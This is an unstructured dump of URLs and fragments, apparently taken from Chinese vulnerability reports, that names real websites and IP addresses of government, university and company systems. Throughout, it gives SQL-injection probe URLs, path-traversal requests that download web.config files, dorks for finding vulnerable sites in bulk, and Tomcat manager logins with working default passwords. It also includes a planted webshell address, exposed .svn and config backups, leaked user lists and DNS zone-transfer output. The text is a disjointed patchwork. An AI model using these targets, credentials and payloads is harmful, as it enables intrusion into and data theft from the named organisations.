http://szsupport.weixin.qq.com/cgi-bin/mmsupport-bin/qrcodelogin?username=*********&key=*************&clientversion=25030133&devicetype=android-18&lan=zh_CN&uuid=AXBIICc4sUSDsFnefkNP&pass_ticket=DebNjGnP2dJnq1bMvHvgL%2BezqqE70Ry9iWB625%2FRT8RRnwCD3tlq3qxuxG5YPzhx http://mp.weixin.qq.com/s?__biz=**********==&mid=10000001&idx=1&sn=bdc73ae816f2e7097c225b6070b1f2f2&from=singlemessage&isappinstalled=0#rd 
http://login.weixin.qq.com/confirm?uuid=e921eed1fbf84e&key=*****************&lang=zh_CN&scan=1406467880&clientversion=25030133&devicetype=android-18 https://login.weixin.qq.com/l/e921eed1fbf84e,经测试发现,可以直接把这个链接发送给用户访问,也可以达到用户扫描的效果 http://photogear.tuchong.com/ http://sec.sangfor.com.cn/trojan/?sid= http://my.mbaobao.com/member/profile/address,新增自己收货地址。 http://e-learning.lenovo.com.cn http://www.cqldbz.gov.cn/common/content.jsp?id=1904 http://visa.zjol.com.cn/visa/ajax/visa_select.aspx?t=type&countryid=13 http://pic.tongcard.net/MemberInfo/ http://www.jntc.nm.cn/zhaosheng/news.asp?id=686 http://www.vasee.com/user/userManager.jsp?item=editGroup http://eelab.zjnu.edu.cn/HomePage/ http://www.wwfchina.org/camp-progress.php?year=2014 inurl:NewsDetail.aspx?Id= http://www.hncdc.com.cn/hncdccms/loginVerify.jsp http://www.ayx.gov.cn/ayx/loginVerify.jsp http://www.hadc.gov.cn/info/loginVerify.jsp http://www.yrihr.com.cn/hky/loginVerify.jsp http://www.zzzxy.gov.cn/zzzx/loginVerify.jsp http://www.zygs.com/zygs/loginVerify.jsp http://www.hwswj.gov.cn/swjcms/loginVerify.jsp www.twgame.com.cn/c/?k=1 http://evewiki.tiancity.com/ http://118.***.**.*:8080/ http://118.***.**.*:8080/ http://***.client.189.cn:8006 http://www.lygey.com:8081/webInfoDetail.jsp?id=1334 http://www.ahhr.com.cn/dy/inf_infodtl.aspx?id=8312 http://www.daxian.cc/ http://www.hntzr.com/newslist.php?catid=110 http://www.hnxljkj.com/newslist.php?tid=4&catid=80 http://www.ruilai1994.com/news.php?tid=4&catid=73 http://www.haishangshengshi.com/news.php?tid=4&catid=82 http://www.gaosenjie.com/news.php?tid=4&catid=80 http://www.hnjdwj.com/news.php?tid=4&catid=94 http://www.hizyy.com/newslist.php?catid=33 http://www.ypguesthouse.com/news.php?tid=4&catid=96 http://www.hnyyj.com/singlepage.php?catid=74 http://www.hnlcjy.com/detial.php?&newsid=72 http://archives.lzu.edu.cn/pub/search/pub_default.asp?fmt=&fopen=&showtitle=&showbtn=&fpub=1&fid=227&id=29 
http://dag.cufe.edu.cn/pub/search/pub_default.asp?fmt=&fopen=&showtitle=&showbtn=&fpub=1&fid=56&id=1 http://www.da.shu.edu.cn/pub/search/pub_default.asp?fmt=&fopen=&showtitle=&showbtn=&fpub=1&fid=563&id=36 http://dag.cug.edu.cn/pub/search/pub_default.asp?fmt=&fopen=_blank&showtitle=&showbtn=&fpub=1&fid=240&id=63 http://dawww.nju.edu.cn/pub/search/pub_default.asp?fmt=&fopen=&showtitle=&showbtn=&fpub=1&fid=108&id=13 http://www.sumwah.com http://www.mcjdc.com http://www.bothcctv.com http://www.szxiaxing.com http://www.menhuiauto.com Http://www.sonady.com Http://www.szhwp.com http://www.szsida.net http://www.guoxing.com.cn http://www.juexinzhipin.cn http://www.szxinhexing.com http://www.szgb888.cn http://www.hy-polycell.com http://www.rpxk.net http://www.szfp2008.com http://www.dphero.com http://www.111abc.com http://www.szpengwang.com http://www.alpsgym.cn URL:http://my.damai.cn/interaction/ComplaintsCreation.aspx?orderid=19668075 http://my.damai.cn/interaction/complaintsDetail/13583 http://my.damai.cn/interaction/complaintsDetail/1234 http://wsz.cq.gov.cn/ http://218.70.39.1/wscl/login.aspx http://sqlmap.org http://www.kuobunet.cn/ http://www.xilaisenwood.com/news_detail.asp?id=9 http://www.premase.com/news_detail.asp?id=127 http://www.deruitechnology.com/news_detail.asp?id=10 http://www.86lbs.com/news_detail.asp?id=128 http://www.huayixj.com/news_detail.asp?id=7 http://www.szyjbd.com/News_detail.asp?id=4 http://www.wsdsz.com/shownews.asp?id=23 http://www.gspro-power.com/news_detail.asp?id=13 http://www.winnerelec.com/news_detail.asp?id=10 http://www.cfdsz.com/news_detail.asp?id=18 http://dapei.mo.vancl.com/invoker/JMXInvokerServlet http://118.144.75.82/ http://www.co-mall.com/cases.html http://iflytek.com:7011/ http://win.fmail.21cn.com/resin-doc/examples/quercus-hello/viewfile?file=WEB-INF/web.xml http://caucho.com/ns/resin file:path=WEB-INF/db"/ http://www.xinhe99.com/ http://mail.damai.cn/ http://地址/.htpasswd http://123.150.254.20/login.cgi 
http://www.gnmz.gov.cn/login.cgi http://www.aoshuwang.cn/login.cgi http://www.bvclear.com.cn/login.cgi http://sc.gxpan.cn:8080/ http://sc.gxpan.cn:8080/index.php/login/dologin https://github.com/bird2014/yypt/blob/44a7287769b3ca8d991c2dc3eebd48f8031a0a3d/yypt/src/schema/01.sql http://www.zxtaw.com/admin/yb_list.asp?fs=&jiebie=&tarid=&types=&sslb=&keywordss=&lb=&la=&jbdw=&cbdw=&p=1 http://www.chizhoufgw.gov.cn/admin/ http://www.hbpu.edu.cn/shownews.asp?id=8387 http://www.esbchina.com/ http://taiheart.com/news/works_425.html http://www.bydoo.com.cn/ http://junyonglawyer.com/ http://www.youleshebeiwang.com/ http://www.fyjchem.com/ http://www.huataicapital.com/ http://www.klztkj.com/ http://www.junyonglawyer.com http://www.bjrtht.com http://www.aimtrip.com.cn http://www.ritaivm.com http://hanhong.swu.edu.cn/ http://shop.cgbchina.com.cn/BusinessCityWeb/eshop_jf/search/sGoodsJFArea.htm?areaid=00&jfRange=1-72000时,顺手在后面加了个单引号,结果弹框提示数据库错误。 http://www.hzsrsj.gov.cn/lemis/netweb/detail/download.jsp?url=../lemis/netweb/detail/&filename=download.jsp http://m.zuyaya.com/update_order_status.action?orderId=1435 http://m.zuyaya.com/update_order_status.action?orderId=1425 http://118.26.203.24:8086/ http://118.26.203.24:8087/缺陷地址 http://www.gettyimages.cn/ http://bbs.game.tom.com/forum.php http://www.cqgl.net/GZDT/List.aspx?n=18&id=18 www.rcwl.net inurl:webschool/Book/ http://zqzx.mhedu.sh.cn/webschool/Book/news_list.jsp?typeId=book0103 http://zqzx.mhedu.sh.cn/webschool/News/news_list.jsp?typeId=news31 http://zqzx.mhedu.sh.cn/webschool/Book/star.jsp?weekly=201429 http://zqzx.mhedu.sh.cn/webschool/Book/star.jsp?classId=cz201210&monthly=201406 http://zqzx.mhedu.sh.cn/webschool/Book/user_read.jsp?classId=cz201301&otherType=3 http://zqzx.mhedu.sh.cn/webschool/Book/news_list.jsp?classId=zqzx201206&typeId=book03 http://zqzx.mhedu.sh.cn/webschool/Book/book_read.jsp?classId=cz201301 http://zqzx.mhedu.sh.cn/webschool/Book/class.jsp?classId=cz201105 
http://zqzx.mhedu.sh.cn/webschool/Book/book_list.jsp?classId=cz201&otherType=1 http://www.syzx.fxedu.cn/webschool/Book/news_list.jsp?typeId=book0103 http://www.syzx.fxedu.cn/webschool/News/news_list.jsp?typeId=news31 http://www.syzx.fxedu.cn/webschool/Book/star.jsp?weekly=201429 http://www.syzx.fxedu.cn/webschool/Book/star.jsp?classId=cz201210&monthly=201406 http://www.syzx.fxedu.cn/webschool/Book/user_read.jsp?classId=cz201301&otherType=3 http://www.syzx.fxedu.cn/webschool/Book/news_list.jsp?classId=zqzx201206&typeId=book03 http://www.syzx.fxedu.cn/webschool/Book/book_read.jsp?classId=cz201301 http://www.syzx.fxedu.cn/webschool/Book/class.jsp?classId=cz201105 http://www.syzx.fxedu.cn/webschool/Book/book_list.jsp?classId=cz201&otherType=1 http://ltzx.zhedu.net.cn/webschool/Book/ http://www.jsgyve.com/webschool/Book/ http://zqzx.mhedu.sh.cn/webschool/Book/ http://beijiao.net.cn/webschool/Book/ http://www.zd7s.net:81/webschool/Book/ http://www.sh-luochuan.net/webschool/Book/ http://58.214.27.195/webschool/Book/ http://ltzx.zhedu.net.cn/webschool/Book/ http://www.msxl.pte.sh.cn/webschool/Book http://222.134.89.202:88/Book/ http://dct.cqbxzx.com/webschool/Book/ http://www.wqxx.fxedu.cn/webschool/MySpace/ http://zqzx.mhedu.sh.cn/webschool/MySpace/ http://www.syzx.fxedu.cn/webschool/NewsMng/ http://www.zrwy.pte.sh.cn/webschool/MySpace/ http://xjxx.qpedu.cn/webschool/MySpace/ http://www.clxx.pte.sh.cn/webschool/login http://www.jcsyxx.pudong-edu.sh.cn/webschool/MySpace/ http://mjcxx.edu.sh.cn/webschool/MySpace/ http://www.sjhxx.net/webschool/MySpace/ http://www.stxx.fxedu.cn/webschool/MySpace/ http://www.ptsunshine.cn/webschool/MySpace/ http://lvyou.elong.com/5622213/pictorial/a34b7s1e.html http://www.zhuoguang.net http://www.cqyywf.com/news/class/index.php?showtag=%E6%8B%89%E4%B8%81%E8%88%9E%E6%9C%8D http://www.cqxsl.com/plus/list.php?tid=20&channelid=24&gzfl=500 http://www.xpqwkj.com/shop/class/?showbrandid=15 http://www.cqhxjlm.com/photo/class/index.php?page=1&catid=3 
http://www.cqqingqing.com/Search.php?keys=88952634 http://www.8090hq.com/about.php?typeid=2 http://jwbinfosys.zju.edu.cn/yjs_xxqr.aspx http://www.vasee.com/event/view.jsp?id=ff8080814790de9d014790ea252a0091 http://esb.imp.189.cn:8820/IMInterfaceCXF/servlet/ImRemote?mid=CKM&t=0.0125964623875916&callback=jQuery17107452902260702103_1406879705310&_=1406879705468&uid=sz189_cn inurl:Permission/Application_Query_List.aspx http://hengdong.gov.cn/Permission/Application_Query_List.aspx http://www.leiyang.gov.cn/Permission/Application_Query_List.aspx http://www.hyyfq.gov.cn/Permission/Application_Query_List.aspx http://zx.cq.gov.cn/Permission/Application_Query_List.aspx http://www.hyx.gov.cn/Permission/Application_Query_List.aspx http://www.hnchangning.gov.cn/Permission/Application_Query_List.aspx http://www.hengshan.gov.cn/Permission/Application_Query_List.aspx http://www.zhengxiang.gov.cn/Permission/Application_Query_List.aspx http://59.51.64.36:5544/Permission/Application_Query_List.aspx http://zmhd.yuhua.gov.cn/Permission/Application_Query_List.aspx http://2007.hengshan.gov.cn/Permission/Application_Query_List.aspx http://www.timber2005.com/ http://exam1.timber2005.com/default.aspx http://exam1.timber2005.com/system/Dep_Right.aspx http://food.ln.sina.com.cn/album-634491.html http://218.17.54.145:81/supplier/portal/login.jsp user:admin pass:123456 url:http://218.17.54.145:81/manager/html user:admin pass:admin http://*.swf的URL都是被允许的,且该URL最终会输出到下面代码所显示的位置: http://www.zbglj.com/Bs_NetBookRe.asp?id=85 http://www.zbglj.com/Bs_NetBookRe.asp?id=85 http://www.zbglj.com/page2.asp?strtype=5&type=lz http://www.zbglj.com/page2.asp?strtype=5&type=lz http://school.10010fj.cn/paipai/newshop/saleMobile_listMobile.action http://www.vasee.com/group/viewgroup.jsp?groupid=ff808081355fdcb8013579b528870583 url:http://61.164.37.12:81/manager/html user:admin pass:admin http://www.vasee.com/email https://www.tonghuafund.com/ http://112.65.148.50/ http://www.tonghuafu 
nd.com/invoker/JMXInvokerServlet system:type=ServerInfo http://www.hcgy.com.cn/news.php?id=4 www.hcgy.com.cn/news.php?id=4 www.hcgy.com.cn/news.php?id=4 http://www.qckd.net/news.asp?id=82 http://www.qckd.net/news.asp?id=71 http://www.qckd.net/news.asp?id=67 http://www.qckd.net/News.asp?ID=42 http://www.qckd.net/News.asp?ID=64 http://www.qckd.net/News.asp?ID=25 http://www.qckd.net/News.asp?ID=52 http://www.qckd.net/News.asp?ID=51 http://www.qckd.net/News.asp?ID=74 http://www.qckd.net/News.asp?ID=75 http://www.qckd.net/News.asp?ID=77 http://www.qckd.net/News.asp?ID=78 http://www.qckd.net/News.asp?ID=79 http://www.qckd.net/News.asp?ID=80 http://www.qckd.net/News.asp?ID=81 http://www.qckd.net/News.asp?ID=83 book.dahe.cn/center/add_del.asp?id=51505608 book.dahe.cn/center/add_del.asp?id=51505604 http://888.qq.com/p/index.php?c=mqqfollow&m=followCaipiao&callback=faa http://fund.ebank.spdb.com.cn/ http://www.cnfront.com/ http://www.ausone.com.cn/about.php?sid=25 http://www.cqzhuoao.com/about.php?sid=10 http://www.icxword.com/about.php?sid=7 http://www.cqaokai.com/news.php?sid=5&id=13 http://www.sheenauto.com/news.php?id=40 http://www.biran.com.cn/news.php?sid=17&id=96 http://www.ausone.com.cn/shop.php?sid1=94 http://www.cncqkx.com/news.php?sid=3&sid1=11&id=103 http://www.cqconco.com/news.php?id=15&id1=4&id2=4 http://www.qjyongyue.com/news.php?news_class=27&id=23 http://book.dahe.cn/center/add_edit.asp?id=51505604 http://book.dahe.cn/center/add_edit.asp?id=51505606 http:demo.zoomla.cn/user/usertalk/SelectFrient.aspx,按昵称查找,注入点 http://zhiyinlou.com/Cas/login http://www.zhiyinlou.com/admin/SysUsers/login http://counter.west263.com/index.asp?login=yes http://bbs.candou.com/ http://appgame.candou.com http://forum.home.news.cn/detail/133362891/1.html http://219.142.122.128 http://219.142.122.128/ewebeditor/admin http://cpst.hbu.edu.cn/ http://bbs.t2cn.com/ http://www.hzjw.gov.cn/ http://wap.hzjw.gov.cn/Account/LogOn http://www.hangzhou.gov.cn/ 
http://stb.hangzhou.gov.cn/info_detail.asp?id=24 http://www.gzhttp.com/wuyun.html http://www.gzhttp.com:8080/system/ http://www.gzhttp.com:8080/manager/html user:admin pass:shenlan http://www.wdaac.cn/Channel/TableDownLoadList.aspx?deptid=weihai393030 http://www.rcsp.cn/Channel/TableDownLoadList.aspx?deptid=weihai395002 http://xzfw.jiaocheng.gov.cn/Channel/TableDownLoadList.aspx?deptid=inspur014063 http://222.135.78.34:8086/Channel/TableDownLoadList.aspx?deptid=weihai395018 http://www.sdsp.cn/Channel/TableDownLoadList.aspx?deptid=weihai395007 http://www.rszwfwzx.gov.cn/Channel/TableDownLoadList.aspx?deptid=weihai395047 http://xzfw.yunyang.gov.cn/Channel/TableDownLoadList.aspx?deptid=yunyang001009 http://218.59.173.67:8002/Channel/TableDownLoadList.aspx?deptid=weihai395028 http://218.59.173.67/Channel/TableDownLoadList.aspx?deptid=weihai395036 http://gamebbs.xunlei.com/ http://gamebbs.xunlei.com/uc_server/ http://cp.veryeast.cn/ http://www.veryeast.cn/paycenter/cp/Pay.asp http://www.lenovostoreapp.com/admin/index.php/3c/sign/login http://lib.hebut.edu.cn/show06.asp?id=282 http://110.98.98.66/bin/PLATFORMWEB.html http://www.chinaunicom-a.com/chinaunicom.do?start=1&field=gddhzl&size=21&frametype=3 http://www.bjzj.gov.cn http://iflytek.com:808/ http://www.vasee.com/event/addevent.jsp(发布活动) http://pics.vasee.com/event/201408215094627272.jsp http://oa.hasee.com/function/help/read_help.php?HELP_ID=182 http://tsonline.lenovo.com.cn/solution/admin/editor.php http://yjs.nwu.edu.cn/eyschool/xcbd_content.php?id=4 https://github.com/thinksaas/ThinkSAAS/blob/bf7c544f3f04a5f4ef18f831b4f270049bd3d94c/data/mail_options.php http://203.130.45.156:10082/web-font/head_include.html http://203.130.45.158:10082/web-font/ http://www.3lsoft.com/.svn/entries http://www.7654.com/.svn/entries http://gx.021.com/.svn/entries http://shiyong.ltsoftware.net/action/base/B2BIndex/ http://nb.gfan.com/admin/index.php inurl:shownews.asp?id= http://www2.sjzue.edu.cn/sjycjy/shownews.asp?id=56 
http://www.qizhigroup.com/shownews.asp?id=208 http://www.v1687.com/shownews.asp?id=33 http://www.hnlrhb.com/shownews.asp?id=6 http://www.hengchengky.com/shownews.asp?id=467 http://www.aqgjss.com/shownews.asp?id=40 http://www.80086006.com/shownews.asp?id=179 http://www.hbhywh.com/shownews.asp?id=34 http://yanduauto.com/kairui/shownews.asp?id=29 http://pass.10jqka.com.cn/login http://www.cjlu.edu.cn/cjlunew/Search.php?K=%27 http://111.75.206.248:8081/ http://116.52.13.46:2014/ http://113.140.74.6/ http://61.178.38.194:2014/ http://220.171.42.161:801/ http://60.190.2.79/ http://113.108.163.164:8080/ http://59.61.92.123:2014/ http://218.58.77.226:82/ http://124.93.228.165:92/ http://58.49.103.227:2014/ http://61.138.188.217:81/ http://218.12.43.28/ http://amic.jxagri.gov.cn/ http://amic.jxagri.gov.cn/jxmulu2014/ http://amic.jxagri.gov.cn url:http://61.180.150.130:80/manager/html user:admin url:http://116.226.86.43:80/manager/html user:admin pass:admin url:http://211.151.82.167:80/manager/html user:admin pass:admin url:http://218.57.241.30:80/manager/html user:admin http://218.57.241.30/SourceCode/LoginAction.action http://218.7.67.24/zs/printpage.asp?ArticleID=34 http://218.7.67.24/zs/printpage.asp?ArticleID=34 http://218.7.67.24/zs/printpage.asp?ArticleID=34 http://218.7.67.24/zs/printpage.asp?ArticleID=34 http://218.7.67.24/zs/printpage.asp?ArticleID=34 inurl:navigate.do http://zsjypt.cwgk.net/navigate.do?method=getPolicyinfoDataById&id=1188&menuNo=07 http://zcpingtai.huadu.gov.cn/navigate.do?method=newCountentById&id=6406&menuno=03 http://hz3z.cwgk.net:8899/navigate.do?method=getPolicyinfoDataById&id=2665&menuNo=07 http://218.14.157.178:8081/navigate.do?method=getPolicyinfoDataById&id=4587&menuNo=05 http://3z.kaiping.gov.cn/navigate.do?method=getPolicyinfoDataById&id=1917&menuNo=09 http://3zgl.zqdz.gov.cn/navigate.do?method=getPolicyinfoDataById&id=510&menuNo=05 url:http://221.7.5.55:80/manager/html user:admin url:http://118.194.38.253:80/manager/html user:admin 
http://58.250.153.8:8000/index.asp http://finance.chinapay.com/insurance/online/web/productList/initProductList.do?ATTRID=ATTR_INDEX_CXAQ http://finance.chinapay.com/manage/mis/system/userManage/passport/login/index.jsp https://reg.163.com/resetpwd/resetpwd.do?username=a123456@163.com http://www.lijiejie.com/wp-content/uploads/2014/08/corp.netease.com_emails.txt http://www.lijiejie.com/wp-content/uploads/2014/08/163_user_questions.txt http://www.lijiejie.com/wp-content/uploads/2014/08/126_user_questions.txt http://open.boc.cn/ http://open.boc.cn/ucs/public/user/checkEmail?usrid=1 http://open.boc.cn/ucs/public/user/checkEmail?usrid=1 http://www.donews.com/idonews/article/3602*.shtm http://www.ky-express.com/chanpin/default.aspx?article=lKnRGOB8 http://www.ky-express.com/jifen/giftfenlei.aspx?class=3 http://www.ky-express.com/command/checkvistorip.ashx http://61.95516.com/ http://61.95516.com/search?shen=%E5%9B%9B%E5%B7%9D&city=%E6%88%90%E9%83%BD&brand=%E5%A4%AA%E5%B9%B3%E6%B4%8B http://img.chinapay.com/data.tar http://www.ddjy.cug.edu.cn/joblist.jsp?channelID=9 http://www.vasee.com/event/view.jsp?day=2014-08-03&emid=ff80808146acac6f014770b306751ec2&id=ff80808146acac6f014770b305231eb8&sub= http://down.mumayi.com/94512 https://itunes.apple.com/cn/app/vasee/id488543987?mt=8 http://reg.kingdee.com/getpass.asp http://reg.kingdee.com/en/getpass.asp zone_server:42.62.41.195 address:123.126.93.163 zone_server:42.62.41.195 name:ks12.newsmth.net address:42.62.43.22 zone_server:42.62.41.195 name:nehalem.newsmth.net address:123.126.93.165 zone_server:42.62.41.195 name:phenom.newsmth.net address:123.126.93.162 zone_server:42.62.41.195 name:ns3.newsmth.net address:123.126.93.165 zone_server:42.62.41.195 name:gift.newsmth.net address:123.126.93.167 zone_server:42.62.41.195 name:war.newsmth.net address:123.126.93.181 zone_server:42.62.41.195 name:ks1.newsmth.net address:42.62.41.195 zone_server:42.62.41.195 name:ks2.newsmth.net address:42.62.41.196 zone_server:42.62.41.195 
name:bloom.newsmth.net address:123.126.93.164 zone_server:42.62.41.195 name:cncatt.newsmth.net address:60.2.251.7 zone_server:42.62.41.195 name:cncatt.newsmth.net address:123.126.93.162 zone_server:42.62.41.195 name:2.newsmth.net address:123.126.93.164 zone_server:42.62.41.195 name:xeonphenom.newsmth.net address:60.2.251.6 zone_server:42.62.41.195 name:xeonphenom.newsmth.net address:60.2.251.7 zone_server:42.62.41.195 name:xeonphenom.newsmth.net address:123.126.93.162 zone_server:42.62.41.195 name:xeon.newsmth.net address:60.2.251.7 zone_server:42.62.41.195 name:military.newsmth.net address:60.2.251.32 zone_server:42.62.41.195 name:conroe.newsmth.net address:111.13.26.2 zone_server:42.62.41.195 name:lynn.newsmth.net address:123.126.93.169 zone_server:42.62.41.195 name:sandy.newsmth.net address:123.126.93.163 zone_server:42.62.41.195 name:ivy.newsmth.net address:123.126.93.168 zone_server:42.62.41.195 name:duron.newsmth.net address:123.126.93.166 zone_server:42.62.41.195 name:tee.newsmth.net address:123.126.93.182 zone_server:42.62.41.195 name:ns1.newsmth.net address:42.62.41.195 zone_server:42.62.41.195 name:chinaops.newsmth.net address:211.154.239.253 zone_server:42.62.41.195 name:chinaops.newsmth.net address:211.154.239.254 zone_server:42.62.41.195 name:westmere.newsmth.net address:111.13.26.1 zone_server:42.62.41.195 name:karaoke.newsmth.net address:123.126.93.180 zone_server:42.62.41.195 name:prescott.newsmth.net address:123.126.93.170 http://nj.focus.cn/dmc/houseprice_show.php?house_id=905,参数house_id http://nj.focus.cn/dmc/houseprice_show.php?house_id=905%27%20and%20%271%27=%271 http://nj.focus.cn/dmc/houseprice_show.php?house_id=905%27%20and%20%271%27=%27111111,1=111111,返回异常 http://zph.veryeast.cn/call/meeting_prediction.asp?provinceId=4 http://www.yqinfo.cn/ http://oa.yunquanoa.com:8800/ http://charity.chinapay.com/ http://charity.chinapay.com/admin/system/index.php http://www.haust.edu.cn/news/detaila.asp?id=43166 http://www.acme-soft.cn/ 
inurl:WebUI/Article_Show.aspx http://www.jxxqgsgl.com/WebUI/Article_Show.aspx?DocID=T201111231558085810000194 http://www.wygsgl.com:9191/WebUI/Article_Show.aspx?DocID=T201407250944374710000194 http://jfgs.jxjtzx.com:9494/WebUI/Article_Show.aspx?DocID=T201406051854485510000375 http://www.jxgsgl.com/WebUI/Article_Show.aspx?DocID=T201406200805416510000738 http://www.jxphgs.com/WebUI/Article_Show.aspx?DocID=T201312301954321010001350 http://www.zoksoft.com/wangzhananli/ http://www.yestehotel.com/ http://www.yestehotel.com/index.php/booking/pay.html?oid=10481 http://www.yestehotel.com/index.php/booking/pay.html?oid=10101 http://www.yestehotel.com/index.php/booking/pay.html?oid=10487 http://monitor.ncu.edu.cn/ http://flight.yestehotel.com/Flight/FlightSearch.asp http://www.sce.tsinghua.edu.cn/course/coursedetail.jsp?id=131 http://www.luoding.gov.cn/website/listpage/list.jsp?topid= http://www.jiajiao400.com/bj/profiles/zixundan http://www.jiajiao400.com/bj/profiles/zxdview?id=37053 http://demo.zoomla.cn/user/iServer/FiServerInfo.aspx?menu=filedown&filepath=//Config//ConnectionStrings.config http://demo.zoomla.cn/user/iServer/FiServer.aspx http://www.utt.com.cn/appexampleview.php?id=1104 http://www.utt.com.cn/appexampleview.php?id=1104 http://www.utt.com.cn/appexampleview.php?id=1104 http://www.utt.com.cn/appexampleview.php?id=1104 http://www.jxbh.cn/ http://zgjxod.com/aboutus.php?id=52 http://ytys1002.com/aboutus.php?id=3 http://www.91lingdu.com/AboutUs.php?showid=46 http://www.nctksy.com/aboutus.php?id=1 http://www.rfled.com/aboutus.php?showid=45 http://www.jxyh.net/aboutus.php?id=1 http://www.mingshunge.com/aboutus.php?id=52 http://www.jxzhzn.net/aboutus.php?id=55 http://www.jxshkx.net/aboutus.php?id=1 http://www.pldsec.com/index.php/Case/index/tpl/6 http://www.agrij.com/) inurl:login_form.jsp http://202.99.207.13:8081/finance11n/init/download_attach.jsp?id=-1 http://124.164.240.217:8080/finance03/init/download_attach.jsp?id=-1 
http://111.12.148.194:7005/finance_qhld/init/download_attach.jsp?id=-1 http://61.185.74.147:8080/finance67/init/download_attach.jsp?id=-1 http://nat.nat123.net:11158/finance/init/download_attach.jsp?id=-1 http://www.cldwcwgk.gov.cn:8083/finance80/init/download_attach.jsp?id=-1 http://116.255.135.35:8082/finance_glx/init/download_attach.jsp?id=-1 http://221.131.81.143:7001/finance_oracle/init/download_attach.jsp?id=-1 http://111.12.148.194:7005/finance_qhld//init/download_attach.jsp?id=-1 http://124.164.240.217:8080/finance03//init/download_attach.jsp?id=-1 http://219.157.74.6:8080/finance/init/download_attach.jsp?id=-1 http://61.185.74.147:8080/finance67/init/download_attach.jsp?id=-1 http://116.255.135.35:8082/finance_glx/init/download_attach.jsp?id=-1 site:kouclo.com http://www.sxrt.gov.cn/soso.aspx?p=1&title=Mr.&type=2 http://wooyun.org/bugs/wooyun-2010-045840找到了厦航的第一个ip段,然后进行80与8080端口检测,发现了一个dmz的登陆以及几个深信服的管理页面跟CISCO的防火墙登陆页面,尝试了深信服的命令执行漏洞未果。将目光转到了web端。最终将目标放在了hr.xiamenair.com.cn,注册用户以后开始全局测试,找了一会儿看到了一个找回密码。对于sql注入我本以为是没有的,想找个逻辑漏洞,在点击找回密码以后,通过抓包看到了 http://hr.xiamenair.com.cn/ashx/Person/Password.ashx?action=PasswordReset&User_Login_Name=xxxxx&User_Name=xxxxxx http://www.ssbz.gov.cn/web/repertory_gr.jsp?sub_repertory_type_id=21 http://www.ssbz.gov.cn/web/repertory_gr.jsp?sub_repertory_type_id=21 http://map.beihai.gov.cn/edit/up_only_address.asp?formname=form1&editname=pic&uppath=upload/news&filelx=jpg http://bbs-mall.chinapay.com/ http://bbs-mall.chinapay.com/config.inc.php.bak http://hayonggu.cn.99114.com/ProductList.shtml?c=101 http://www.wangxuankj.com/IndexAction.do http://www.fzjsqqy.cn/eyesplay/vPlay.aspx http://www.douban.com/contacts/find http://10.10.10.1/message_add.html url:http://124.225.113.73:8080/manager/html user:admin pass:admin http://blog.fang.com/blogweb/blog_manage/gratulate.aspx http://icp.sundns.com/testphp/testphp.php?start_item=28960 http://www.hbhk.com.cn/index.action inurl:zsgl/bswb/ http://yjsy.cqmu.edu.cn:8080/zsgl/bswb/bscjcx.aspx 
http://202.119.84.62/zs/lqgl/zs_ssxscx.aspx http://yjsb.kmmc.cn/zs/bswb/bscjcx.aspx http://yjs.htu.edu.cn/zsgl/bswb/bscjcx.aspx http://www.cupta.net.cn/ http://www.pantosoft.com/pantogj/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.pantosoft.com/pantoxfz/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://61.181.88.59/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://58.210.204.245/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.vszhh.pudong-edu.sh.cn/pantoschool/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.xzzz.cn/pantoschool/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.scp.edu.cn:8600/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.gxjdgyxx.com:8300/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://oa.qyzx.mhedu.sh.cn/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.cyzjdd.com:7000/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.zqnx.com:20000/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://cd.ntjx.org/Module/XT/FileUploader/DownLoadFile.aspx?f=/web.config http://www.blogbus.com/search/3'/tags http://xxxx.blogbus.com/user/js/calendar2.js/1.php http://dongling.cn.99114.com/AlbumList.shtml?c=101 http://mobile.9158.com/ http://**.**.**.**/newslist-con.php?id=30 http://**.**.**.**/lcchen/hj_content.php?id=13014&code=003004010002 http://**.**.**.**/newslist-con.php?id=30 http://**.**.**.**/ http://dlyanshen.cn.99114.com/AlbumList.shtml?c=101 http://admin.dooland.com/test/news/install.php http://admin.dooland.com/test/news/config.inc.php.bak http://im.umetrip.com/admin/index.php http://www.eqjn.cn/d.aspx http://xtj.dajie.com/wx/xtj/103/referee/scan?tmpId=170723页面的tmpId参数可跳转到他人页面,如下图: http://www.csks.gov.cn/csjsj/webregister/index.aspx http://www.wisedu.com/ http://fly.piao.com.cn/ http://www.zjloomax.com/sccms/ http://www.cnlxljl.com/sccms/ http://ky3x.net/sccms/ http://www.pysyzx.net/ 
http://muagent-hk.ceair.com/test/a/user_detail.aspx?usrId=0003 http://muagent-hk.ceair.com/test/a/user_detail.a http://sqlmap.org http://www.cmipc.org/1.txt inurl:/ws2004/ http://222.33.81.31:8080/NCSS2/jetsennet/ncss/appmanage/login!login.action url:http://222.33.81.31:8080/manager/html user:admin pass:123456 http://222.33.81.31:8080/NCSS2/ getwebshell:http://mail.qjxgold.com/shell.asp http://mail.qjxgold.com/NewFile.txt http://blog.fang.com/50048490/blogcommentlist.htm#go209039 http://jiaowu.nwsuaf.edu.cn http://service.weibo.com/share/share.php?url=http://admin.weibo.com&appkey=&title=&pic=&ralateUid=&language= http://demo.zoomla.cn/app/addTemplate.aspx后台管理,应用推送添加模板处。 http://hzp.rayli.com.cn/tryapply/tryreportlist/?tryid=880 http://ise.ujn.edu.cn/isenews/echobin.php?id=627 site:pigai.org inurl:eid site:pigai.org http://vote.pigai.org/Home/index.php?s=/Qa/index/id/33 http://www.nitc.cc/ http://demo.nitc.cc/ http://demo.cnnitc.com/statistics.php http://www.xiantao.jcy.gov.cn/xtjcyadmin/index.php http://iask.finance.sina.com.cn/b/18834257.html http://www.qysi.gov.cn/websys/jsp/website/personquery/personbase.jsp?AAC002=身份证号码&AAC001=2000122411 http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 http://www.qysi.gov.cn/jsp/website/personquery/personbase.jsp?AAC001=2000122411 